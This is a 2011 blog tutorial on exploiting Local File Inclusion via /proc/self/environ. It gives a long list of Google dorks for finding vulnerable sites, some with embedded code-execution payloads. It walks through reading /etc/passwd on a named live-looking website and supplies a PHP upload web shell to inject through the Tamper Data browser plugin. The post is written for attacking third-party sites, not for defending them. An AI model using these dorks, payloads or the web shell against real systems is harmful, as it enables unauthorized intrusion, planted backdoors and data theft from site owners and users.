Recent Post

Flag Counter

Monday, April 18, 2011

[Tut] Local File Inculusion / LFI (/proc/self/environ)

Monday, April 18, 2011  Unknown  No comments

LFI (Local File Inclusion) /proc/self/environ Tamper data
LFI (Local File Inclusion)

What is LFI or Local File Inclusion?
This Description from Wikipedia
is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected
Example of Php Vulnerable script

<?php $file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}

So this script PHP could be injected like
http://example.com/index.php?file=contactus.php


OK Now i will show you POC exploited This vulnerablity The Way backdoored shell via Tamper data

1.First.you could search in google Vulnerable website.HEre Are The list of Dorks ive collected..
Dorks :

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

 inurl:/include/new-visitor.inc.php?lvc_include_dir=

 inurl:/_functions.php?prefix=

 inurl:/cpcommerce/_functions.php?prefix=

 inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

 inurl:/modules/agendax/addevent.inc.php?agendax_path=

 inurl:/ashnews.php?pathtoashnews=

 inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

 inurl:/pm/lib.inc.php?pm_path=

 inurl:/b2-tools/gm-2-b2.php?b2inc=

 inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

 inurl:/modules/agendax/addevent.inc.php?agendax_path=

 inurl:/includes/include_once.php?include_file=

 inurl:/e107/e107_handlers/secure_img_render.php?p=

 inurl:/shoutbox/expanded.php?conf=

 inurl:/main.php?x=

 inurl:/myPHPCalendar/admin.php?cal_dir=

 inurl:/index.php/main.php?x=

 inurl:/index.php?include=

 inurl:/index.php?x=

 inurl:/index.php?open=

 inurl:/index.php?visualizar=

 inurl:/template.php?pagina=

 inurl:/index.php?pagina=

 inurl:/index.php?inc=

 inurl:/includes/include_onde.php?include_file=

 inurl:/index.php?page=

 inurl:/index.php?pg=

 inurl:/index.php?show=

 inurl:/index.php?cat=

 inurl:/index.php?file=

 inurl:/db.php?path_local=

 inurl:/index.php?site=

 inurl:/htmltonuke.php?filnavn=

 inurl:/livehelp/inc/pipe.php?HCL_path=

 inurl:/hcl/inc/pipe.php?HCL_path=

 inurl:/inc/pipe.php?HCL_path=

 inurl:/support/faq/inc/pipe.php?HCL_path=

 inurl:/help/faq/inc/pipe.php?HCL_path=

 inurl:/helpcenter/inc/pipe.php?HCL_path=

 inurl:/live-support/inc/pipe.php?HCL_path=

 inurl:/gnu3/index.php?doc=

 inurl:/gnu/index.php?doc=

 inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

 inurl:/forum/install.php?phpbb_root_dir=

 inurl:/includes/calendar.php?phpc_root_path=

 inurl:/includes/setup.php?phpc_root_path=

 inurl:/inc/authform.inc.php?path_pre=

 inurl:/include/authform.inc.php?path_pre=

 inurl:index.php?nic=

 inurl:index.php?sec=

 inurl:index.php?content=

 inurl:index.php?link=

 inurl:index.php?filename=

 inurl:index.php?dir=

 inurl:index.php?document=

 inurl:index.php?view=

 inurl:*.php?sel=

 inurl:*.php?session=&content=

 inurl:*.php?locate=

 inurl:*.php?place=

 inurl:*.php?layout=

 inurl:*.php?go=

 inurl:*.php?catch=

 inurl:*.php?mode=

 inurl:*.php?name=

 inurl:*.php?loc=

 inurl:*.php?f=

 inurl:*.php?inf=

 inurl:*.php?pg=

 inurl:*.php?load=

 inurl:*.php?naam=

 allinurl:/index.php?page= site:*.dk

 allinurl:/index.php?file= site:*.dk

 INURL OR ALLINURL WITH:

 /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

 /includes/header.php?systempath=

 /Gallery/displayCategory.php?basepath=

 /index.inc.php?PATH_Includes=

 /ashnews.php?pathtoashnews=

 /ashheadlines.php?pathtoashnews=

 /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

 /demo/includes/init.php?user_inc=

 /jaf/index.php?show=

 /inc/shows.inc.php?cutepath=

 /poll/admin/common.inc.php?base_path=

 /pollvote/pollvote.php?pollname=

 /sources/post.php?fil_config=

 /modules/My_eGallery/public/displayCategory.php?basepath=

 /bb_lib/checkdb.inc.php?libpach=

 /include/livre_include.php?no_connect=lol&chem_absolu=

 /index.php?from_market=Y&pageurl=

 /modules/mod_mainmenu.php?mosConfig_absolute_path=

 /pivot/modules/module_db.php?pivot_path=

 /modules/4nAlbum/public/displayCategory.php?basepath=

 /derniers_commentaires.php?rep=

 /modules/coppermine/themes/default/theme.php?THEME_DIR=

 /modules/coppermine/include/init.inc.php?CPG_M_DIR=

 /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

 /coppermine/themes/maze/theme.php?THEME_DIR=

 /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

 /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

 /myPHPCalendar/admin.php?cal_dir=

 /agendax/addevent.inc.php?agendax_path=

 /modules/mod_mainmenu.php?mosConfig_absolute_path=

 /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

 /main.php?page=

 /default.php?page=

 /index.php?action=

 /index1.php?p=

 /index2.php?x=

 /index2.php?content=

 /index.php?conteudo=

 /index.php?cat=

 /include/new-visitor.inc.php?lvc_include_dir=

 /modules/agendax/addevent.inc.php?agendax_path=

 /shoutbox/expanded.php?conf=

 /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

 /pivot/modules/module_db.php?pivot_path=

 /library/editor/editor.php?root=

 /library/lib.php?root=

 /e107/e107_handlers/secure_img_render.php?p=

 /zentrack/index.php?configFile=

 /main.php?x=

 /becommunity/community/index.php?pageurl=

 /GradeMap/index.php?page=

 /index4.php?body=

 /side/index.php?side=

 /main.php?page=

 /es/index.php?action=

 /index.php?sec=

 /index.php?main=

 /index.php?sec=

 /index.php?menu=

 /html/page.php?page=

 /page.php?view=

 /index.php?menu=

 /main.php?view=

 /index.php?page=

 /content.php?page=

 /main.php?page=

 /index.php?x=

 /main_site.php?page=

 /index.php?L2=

 /content.php?page=

 /main.php?page=

 /index.php?x=

 /main_site.php?page=

 /index.php?L2=

 /index.php?show=

 /tutorials/print.php?page=

 /index.php?page=

 /index.php?level=

 /index.php?file=

 /index.php?inter_url=

 /index.php?page=

 /index2.php?menu=

 /index.php?level=

 /index1.php?main=

 /index1.php?nav=

 /index1.php?link=

 /index2.php?page=

 /index.php?myContent=

 /index.php?TWC=

 /index.php?sec=

 /index1.php?main=

 /index2.php?page=

 /index.php?babInstallPath=

 /main.php?body=

 /index.php?z=

 /main.php?view=

 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

 /index.php?file=

 /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

 2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

 3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

 4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

 5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

 6. allinurl:ihm.php?p=

 7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

 8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

 10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

 11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

 12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

 13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

 14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

 15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

 16. allinurl:ihm.php?p=*

 14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

 15. allinurl:.php?bodyfile=

 16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

 17. allinurl:forums.html
/modules.php?name=

 18. allinurl:/default.php?page=home

 19. allinurl:/folder.php?id=

 20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

 21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 22. allinurl:application.php?base_path=
/application.php?base_path=

 23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

 24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

 26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

 27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

 28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

 29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

 30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

 31. keyword : "Powered by iUser"
/common.php?include_path=

 32. allinurl: "static.php?load="
/static.php?load=

 33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

 34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

 35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=
LFI(Local File Inclusion)

 acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=


2.OK after Get the Website,Check That Website
For example;
http://vanessasbodymall.com/index.php?page=products.php

Is that website could call /etc/passwd File ????
You could add an ../../ << To go to that Server Website Directory
http://vanessasbodymall.com/index.php?page=/etc/passwd

3.So if '/etc/passwd' could be Called So that Site Vulnerable With LFI.So How To plant WebShell/Backdoor? > You should check Wheather /proc/self/environ < Could be Called ,So The URI likes below
http://vanessasbodymall.com/index.php?page=../../../../../../../../proc/self/environ

4.Upload Sheel via tamper data
You Should download That firefox plugin..Here i Give U the link
https://addons.mozilla.org/en-us/firefox/downloads/file/79565/tamper_data-11.0.1-fx.xpi?src=addondetail&confirmed=1

Ok Next Step after installing the plugin

a.Restart Your browser Mozilla Firefox
b.Then Click "Tool" > "MenuBar" and klik "Tamper Data"
c.Click start tamper > lalu refresh page tersebut
d.So will be pop up > Click "Tamper"
e.Replace This Code or You could Replace anything php evil code
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; }
else { echo '<b>Upload Failed! </b><br><br>'; }
}
?>

f.Yes Right..If You're Success plant That Php Script..This Script will be located at http://vanessasbodymall.com/Yourshellname.php

Search Terms :

  • local file inclusion
  • remote file inclusion
  • local file inclusion tutorial
  • local file inclusion vulnerability
  • lfi local file inclusion
  • local file inclusion exploit
  • local file include
  • web server vulnerability
  • vulnerability php
  • vulnerability of web server
  • web server attacks

Read More